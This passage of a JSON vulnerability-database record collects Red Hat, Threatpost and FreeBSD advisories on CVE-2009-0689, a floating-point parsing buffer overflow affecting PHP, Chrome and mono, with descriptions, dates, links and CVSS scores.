"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:47:06", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA buffer overflow flaw was found in the way PHP parsed floating point\nnumbers from their text representation. If a PHP application converted\nuntrusted input strings to numbers, an attacker able to provide such input\ncould cause the application to crash or, possibly, execute arbitrary code\nwith the privileges of the application. (CVE-2009-0689)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n", "modified": "2017-09-08T11:51:25", "published": "2014-03-18T04:00:00", "id": "RHSA-2014:0312", "href": "https://access.redhat.com/errata/RHSA-2014:0312", "type": "redhat", "title": "(RHSA-2014:0312) Critical: php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T23:09:31", "bulletinFamily": "info", "cvelist": ["CVE-2009-0689"], "description": "Google has pushed out a new version of its Chrome browser to fix a high-severity security hole that could lead to malicious code execution attacks.[](<https://threatpost.com/high-risk-flaw-fixed-google-chrome-100609/>)\n\nThe vulnerability could be exploited to run arbitrary code within the Google Chrome sandbox, the company said in an advisory.\n\nThe [raw details](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689>):\n\n * The v8 engine uses a common dtoa() implementation to parse strings into floating point numbers. We have applied a patch to fix a recent bug in this component.\n * Severity: High. An attacker might be able to run arbitrary code within the Google Chrome sandbox.\n", "modified": "2013-04-17T16:39:51", "published": "2009-10-06T22:32:02", "id": "THREATPOST:DF62052EA2F1372006ACE34D8541F7DB", "href": "https://threatpost.com/high-risk-flaw-fixed-google-chrome-100609/72204/", "type": "threatpost", "title": "'High Risk' Flaw Fixed in Google Chrome", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "\nNCC Group reports:\n\nAn attacker who can cause a carefully-chosen string to be\n\t converted to a floating-point number can cause a crash and potentially\n\t induce arbitrary code execution.\n\n", "edition": 4, "modified": "2015-12-19T00:00:00", "published": "2015-12-19T00:00:00", "id": "4B3A7E70-AFCE-11E5-B864-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/4b3a7e70-afce-11e5-b864-14dae9d210b8.html", "title": "mono -- DoS and code execution", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}